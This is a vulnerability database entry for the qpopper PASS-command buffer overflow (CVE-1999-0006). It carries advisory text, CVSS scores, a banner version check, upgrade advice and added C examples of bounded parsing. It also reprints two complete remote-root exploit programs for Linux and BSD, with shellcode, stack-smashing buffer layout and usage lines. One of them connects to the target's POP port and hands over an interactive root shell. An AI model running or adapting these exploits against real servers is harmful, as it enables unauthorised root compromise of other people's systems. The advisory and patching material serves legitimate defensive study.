CVE-1999-0006
CVSS 10.0
Published: 1998-07-14 00:00:00
Revised: 2008-09-09 08:33:31

[Original] Buffer overflow in POP servers based on BSD/Qualcomm's qpopper allows remote attackers to gain root access using a long PASS command.


[CNNVD] Qualcomm QPopper Multiple Command Remote Buffer Overflow Vulnerability (CNNVD-199807-013)

        
QPopper is free, open-source software developed and maintained by Qualcomm; it runs on many Linux and Unix operating systems.
Versions of qpopper before 2.5 contain a number of buffer overflow vulnerabilities. A remote attacker can exploit them to execute arbitrary instructions on the affected host.
The vulnerability exists because qpopper does not properly check or filter user-supplied POP commands (including USER and PASS): an argument longer than 1024 bytes causes a buffer overflow. The vulnerability was widely discussed on Bugtraq, and exploit programs for Linux and *BSD systems already exist.
To confirm whether a host is affected, use the following command:
% telnet yourmailhost.your.domain.com 110
Trying 123.123.123.123
Connected to mailhost
+OK QPOP (version 2.4) at yourmailhost.your.domain.com starting
If the version returned is earlier than 2.5 (including 2.5 beta), the host is affected; upgrade to the latest version as soon as possible.
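The description above attributes the overflow to POP command arguments that are copied into a fixed buffer without a length check. The following C is an added illustration, not qpopper's own code: a hypothetical command-line parser in the unchecked form, beside a bounded form that refuses any argument that would not fit in a 1024-byte buffer. The struct and function names, and the sample lines, are assumptions made for this example.

```c
/* Illustration of the flaw class described above: a POP3 command line whose
 * argument is copied into a fixed 1024-byte buffer. The unchecked parser
 * overruns the buffer on a long argument; the bounded parser measures first
 * and refuses. Hypothetical names; this is not qpopper's own code. */
#include <stdio.h>
#include <string.h>

#define ARG_BUF_LEN 1024            /* fixed argument buffer, as in the description */

struct pop_cmd {
    char verb[5];                   /* POP3 verbs are 3 or 4 letters */
    char arg[ARG_BUF_LEN];
};

/* Unchecked pattern: "%s" copies the whole argument whatever its length, so an
 * argument of ARG_BUF_LEN bytes or more overruns cmd->arg on the stack.
 * Kept only for contrast; never use it on network input. */
int parse_pop_line_unchecked(const char *line, struct pop_cmd *cmd)
{
    return sscanf(line, "%4s %s", cmd->verb, cmd->arg) == 2;
}

/* Bounded pattern: the argument is measured before anything is copied, and a
 * line whose argument would not fit (with its terminator) is rejected, leaving
 * cmd untouched. Returns 1 on success, 0 if the caller should answer -ERR. */
int parse_pop_line_bounded(const char *line, size_t line_len, struct pop_cmd *cmd)
{
    size_t verb_len, arg_start, arg_len;

    /* Drop the trailing CRLF of the network line */
    while (line_len > 0 && (line[line_len - 1] == '\n' || line[line_len - 1] == '\r'))
        line_len--;

    verb_len = 0;
    while (verb_len < line_len && line[verb_len] != ' ')
        verb_len++;
    if (verb_len == 0 || verb_len >= sizeof cmd->verb)
        return 0;

    arg_start = verb_len;
    while (arg_start < line_len && line[arg_start] == ' ')
        arg_start++;
    arg_len = line_len - arg_start;
    if (arg_len >= sizeof cmd->arg)     /* no room for the NUL terminator */
        return 0;

    memcpy(cmd->verb, line, verb_len);
    cmd->verb[verb_len] = '\0';
    memcpy(cmd->arg, line + arg_start, arg_len);
    cmd->arg[arg_len] = '\0';
    return 1;
}

/* Constructed input: "PASS " followed by n bytes of 'A' and CRLF.
 * Returns what the bounded parser makes of it (-1 if n is too large to build). */
int bounded_accepts_arg_of_len(size_t n)
{
    static char line[8 + 2048];
    struct pop_cmd cmd;
    if (n > 2048)
        return -1;
    memcpy(line, "PASS ", 5);
    memset(line + 5, 'A', n);
    memcpy(line + 5 + n, "\r\n", 2);
    return parse_pop_line_bounded(line, 5 + n + 2, &cmd);
}

/* Sanity check that a normal line is split into verb and argument. */
int bounded_parses_normal_line(void)
{
    struct pop_cmd cmd;
    const char *line = "PASS hunter2\r\n";   /* constructed sample */
    if (!parse_pop_line_bounded(line, strlen(line), &cmd))
        return 0;
    return strcmp(cmd.verb, "PASS") == 0 && strcmp(cmd.arg, "hunter2") == 0;
}

int main(void)
{
    printf("normal line parsed: %d\n", bounded_parses_normal_line());
    printf("1023-byte argument accepted: %d\n", bounded_accepts_arg_of_len(1023));
    printf("1024-byte argument accepted: %d\n", bounded_accepts_arg_of_len(1024));
    printf("1100-byte argument accepted: %d\n", bounded_accepts_arg_of_len(1100));
    return 0;
}
```

The boundary is the terminator: a 1023-byte argument fills the buffer exactly, a 1024-byte one is refused. A server written this way answers `-ERR` to the over-long PASS line instead of corrupting its stack.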
        

- CVSS (Base Score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [complete information disclosure exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (Affected Platforms and Products)

Product and version information (CPE) not yet available

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0006
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0006
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199807-013
(Official data source) CNNVD

- Other Links and Resources

http://www.securityfocus.com/bid/133
(UNKNOWN)  BID  133
ftp://patches.sgi.com/support/free/security/advisories/19980801-01-I
(UNKNOWN)  SGI  19980801-01-I

- Vulnerability Information

Qualcomm QPopper Multiple Command Remote Buffer Overflow Vulnerability
Critical  Other
1998-07-14 00:00:00 2005-05-02 00:00:00
Remote
        

- Advisories and Patches

Temporary workaround:
If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
* Temporarily shut down the POP service, or set a policy on the border firewall that allows access only from trusted users.
Vendor patch:
Qualcomm
--------
Download the current latest version from the vendor:
ftp://ftp.qualcomm.com/

- Vulnerability Information (19109)

Qualcomm qpopper 2.4 POP Server Buffer Overflow Vulnerability (1) (EDBID:19109)
linux remote
1998-06-27 Verified
0 Seth McGann
N/A
source: http://www.securityfocus.com/bid/133/info

A number of buffer-overflow issues reside in versions prior to 2.5 of Qualcomm's 'qpopper' program. Exploiting this issue allows a remote attacker to execute arbitrary commands on hosts that are running a vulnerable version. 

To determine if you are vulnerable, telnet to port 110 on the possibly vulnerable host. A banner appears, informing you of the version of the pop server. For example: 

% telnet yourmailhost.your.domain.com 110 
Trying 123.123.123.123 
Connected to mailhost 
+OK QPOP (version 2.4) at yourmailhost.your.domain.com starting 

If any version prior to 2.5 is reported, including 2.5 beta, you should upgrade immediately to the latest version.
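As an added example (not from the original advisory, and not Qualcomm's code), a C routine that applies the banner check above programmatically: it parses the `+OK QPOP (version X.Y)` greeting and reports whether the advertised version is in the affected range (before 2.5, or a 2.5 beta). The banners it is run on are constructed sample strings modelled on the one above; the struct and function names are assumptions.

```c
/* Added example: classify a POP3 greeting banner by the qpopper version it
 * advertises. Affected range per the advisory: anything before 2.5, plus
 * 2.5 beta builds. Function names are assumptions; banners are constructed. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct qpop_version {
    int major;
    int minor_scaled;   /* minor part as a 3-digit decimal fraction: "5" -> 500, "41" -> 410 */
    int beta;           /* 1 if a beta marker follows the number */
};

/* Parse "... QPOP (version 2.4) ..." into major/minor/beta.
 * Returns 1 on success, 0 if the banner is not a QPOP greeting. */
int parse_qpop_banner(const char *banner, struct qpop_version *out)
{
    const char *marker = "QPOP (version ";
    const char *p = strstr(banner, marker);
    char *end;
    long major;
    int scaled = 0, digits = 0;

    if (p == NULL)
        return 0;
    p += strlen(marker);

    major = strtol(p, &end, 10);
    if (end == p || *end != '.')
        return 0;
    p = end + 1;

    /* The minor part is compared as a decimal fraction so that
       2.41 < 2.5 < 2.53; it is scaled to three digits. */
    while (isdigit((unsigned char)*p) && digits < 3) {
        scaled = scaled * 10 + (*p - '0');
        p++;
        digits++;
    }
    if (digits == 0)
        return 0;
    while (digits < 3) {
        scaled *= 10;
        digits++;
    }
    while (isdigit((unsigned char)*p))      /* ignore further precision */
        p++;
    if (*p == '.') {                        /* third component, e.g. "2.1.4" */
        p++;
        while (isdigit((unsigned char)*p))
            p++;
    }
    while (*p == ' ')
        p++;

    out->major = (int)major;
    out->minor_scaled = scaled;
    out->beta = (*p == 'b' || *p == 'B');   /* "2.5b2", "2.5 beta" */
    return 1;
}

/* 1 = affected (before 2.5, or 2.5 beta), 0 = not in the affected range,
 * -1 = not a QPOP banner (another POP server, or a banner that hides the version). */
int qpop_banner_affected(const char *banner)
{
    struct qpop_version v;
    if (!parse_qpop_banner(banner, &v))
        return -1;
    if (v.major != 2)
        return v.major < 2;
    if (v.minor_scaled < 500)
        return 1;
    return v.minor_scaled == 500 && v.beta;
}

int main(void)
{
    /* Constructed sample banners, modelled on the one in the advisory */
    const char *samples[] = {
        "+OK QPOP (version 2.4) at yourmailhost.your.domain.com starting",
        "+OK QPOP (version 2.5b2) at mail.example.test starting",
        "+OK QPOP (version 2.53) at mail.example.test starting",
        "+OK POP3 server ready",
    };
    size_t i;
    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%2d  %s\n", qpop_banner_affected(samples[i]), samples[i]);
    return 0;
}
```

A return of -1 is not a clean bill of health: a server whose banner omits the version still has to be checked by package version or configuration, and a banner is only evidence of what the daemon claims, not of the binary actually running.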

/* Exploit for qpopper 2.4 (and others) for Linux
 *   by [WaR] (warchild@cryogen.com) and zav (zav@cryogen.com)
 *
 *  usage: (./qpopper <offset>;cat)|nc <victim> 110
 *       with offset around 1000 (try increments of 50)
 *
 *
 *    shout outs to: Zef and YZF
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen */

#define BUFFSIZE 998

/* Linux/x86 execve("/bin/sh") shellcode */
char shell[] =
   "\xeb\x33\x5e\x89\x76\x08\x31\xc0"
   "\x88\x66\x07\x83\xee\x02\x31\xdb"
   "\x89\x5e\x0e\x83\xc6\x02\xb0\x1b"
   "\x24\x0f\x8d\x5e\x08\x89\xd9\x83"
   "\xee\x02\x8d\x5e\x0e\x89\xda\x83"
   "\xc6\x02\x89\xf3\xcd\x80\x31\xdb"
   "\x89\xd8\x40\xcd\x80\xe8\xc8\xff"
   "\xff\xff/bin/sh";

/* Returns the current stack pointer: on 32-bit x86 the value left in %eax
 * is taken as the return value (the original trick; only works unoptimised). */
unsigned long esp()
{
  __asm__(" movl %esp,%eax ");
}

int main(int argc, char **argv)
{
  int i,j,offset;
  unsigned long eip;
  char buffer[4096];

  if(argc<2) {
    fprintf(stderr,"usage: %s <offset>\n",argv[0]);
    return 1;
  }
  j=0;
  offset=atoi(argv[1]);
  eip=esp()+offset;
  /* NOP sled, with the shellcode placed just below the return-address slot */
  for(i=0;i<1008;i++) buffer[i]=0x90;
  for(i=(BUFFSIZE - strlen(shell));i<BUFFSIZE;i++) buffer[i]=shell[j++];

  /* overwritten return address, little-endian */
  i=1005;
  buffer[i]=eip & 0xff;
  buffer[i+1]=(eip >> 8) & 0xff;
  buffer[i+2]=(eip >> 16) & 0xff;
  buffer[i+3]=(eip >> 24) & 0xff;
  buffer[i+4]='\0';   /* terminate so printf("%s") stops here */

  printf("%s\nsh -i\n",buffer);
  return 0;
}

- Vulnerability Information (19110)

Qualcomm qpopper 2.4 POP Server Buffer Overflow Vulnerability (2) (EDBID:19110)
unix remote
1998-06-27 Verified
0 Miroslaw Grzybek
N/A
source: http://www.securityfocus.com/bid/133/info
 

/*
 *      QPOPPER - remote root exploit
 *      by Miroslaw Grzybek <mig@zeus.polsl.gliwice.pl>
 *
 *              - tested against: FreeBSD 3.0
 *                                FreeBSD 2.2.x
 *                                BSDI BSD/OS 2.1
 *              - offsets: FreeBSD with qpopper 2.3 - 2.4    0
 *                         FreeBSD with qpopper 2.1.4-R3     900
 *                         BSD/OS  with qpopper 2.1.4-R3     1500
 *
 *      this is for EDUCATIONAL purposes ONLY
 */

#include        <stdio.h>
#include        <stdlib.h>
#include        <string.h>      /* memset, memcpy, strlen */
#include        <sys/time.h>
#include        <sys/types.h>
#include        <unistd.h>
#include        <sys/socket.h>
#include        <netinet/in.h>
#include        <netdb.h>

#include        <sys/errno.h>

/* BSD/x86 execve("/bin/sh") shellcode */
char *shell="\xeb\x32\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x12\x89\x5e\x17"
            "\x88\x5e\x1c\x8d\x1e\x89\x5e\x0e\x31\xc0\xb0\x3b\x8d\x7e"
            "\x0e\x89\xfa\x89\xf9\xbf\x10\x10\x10\x10\x29\x7e\xf5\x89"
            "\xcf\xeb\x01\xff\x62\x61\x63\x60\xeb\x1b\xe8\xc9\xff\xff"
            "\xff/bin/sh\xaa\xaa\xaa\xaa\xff\xff\xff\xbb\xbb\xbb\xbb"
            "\xcc\xcc\xcc\xcc\x9a\xaa\xaa\xaa\xaa\x07\xaa";

#define ADDR 0xefbfd504         /* stack address guessed for the tested FreeBSD builds */
#define OFFSET 0
#define BUFLEN 1200

char    buf[BUFLEN+2];          /* payload plus trailing newline and terminator */
int     offset=OFFSET;

int     sock;
struct  sockaddr_in sa;
struct  hostent *hp;

int main (int argc, char *argv[]) {
        int i;

        if(argc<2) {
                printf("Usage: %s <IP | HOSTNAME> [offset]\n",argv[0]);
                exit(0);
        }
        if(argc>2)
                offset=atoi(argv[2]);

        /* Prepare buffer: NOP sled, shellcode at 800, then the return
         * address repeated from 901 up to the end of the payload */
        memset(buf,0x90,BUFLEN);
        memcpy(buf+800,shell,strlen(shell));
        for(i=901;i<BUFLEN-4;i+=4)
                *(int *)&buf[i]=ADDR+offset;
        buf[BUFLEN]='\n';
        buf[BUFLEN+1]='\0';     /* terminate so strlen() below stops at the newline */

        /* Resolve remote hostname & connect*/
        if((hp=(struct hostent *)gethostbyname(argv[1]))==NULL) {
                perror("gethostbyname()");
                exit(0);
        }

        if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
                perror("socket()");
                exit(0);
        }
        sa.sin_family=AF_INET;
        sa.sin_port=htons(110);
        memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length);
        if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=0) {
                perror("connect()");
                exit(0);
        }
        printf("CONNECTED TO %s... SENDING DATA\n",argv[1]); fflush(stdout);
        /* Write evil data */
        write(sock,buf,strlen(buf));

        /* Enjoy root shell ;) */
        while(1) {
                fd_set input;

                FD_ZERO(&input);        /* the set must be cleared before each select() */
                FD_SET(0,&input);
                FD_SET(sock,&input);
                if((select(sock+1,&input,NULL,NULL,NULL))<0) {
                        if(errno==EINTR) continue;
                        printf("CONNECTION CLOSED...\n"); fflush(stdout);
                        exit(1);
                }
                if(FD_ISSET(sock,&input))
                        write(1,buf,read(sock,buf,BUFLEN));
                if(FD_ISSET(0,&input))
                        write(sock,buf,read(0,buf,BUFLEN));
        }
}

- Vulnerability Information

912
Qualcomm POP Server (Qpopper) PASS Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Vendor Verified

- Vulnerability Description

- Timeline

1998-06-28 Unknown
Unknown Unknown

- Solution

Upgrade to version 4.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability Author

Unknown or Incomplete

- Vulnerability Information

Qualcomm POP Server Buffer Overflow Vulnerability
Boundary Condition Error 133
Yes No
1998-06-27 12:00:00 2007-07-06 07:47:00
The original warning about the widespread availability of an exploit for this vulnerability was posted to Bugtraq by Seth McGann (smm@WPI.EDU) on June 27th, 1998. Discussion continued on Bugtraq for several weeks thereafter. An exploit for Linux was post

- Affected Program Versions

Qualcomm qpopper 2.4


- Exploit

The following exploit code is available:

- Solution

Upgrade to the most current version of qpopper, which is available at:

ftp://ftp.qualcomm.com/

Individual vendor responses can be found in CERT advisory CA-98.08.

- References

     

     
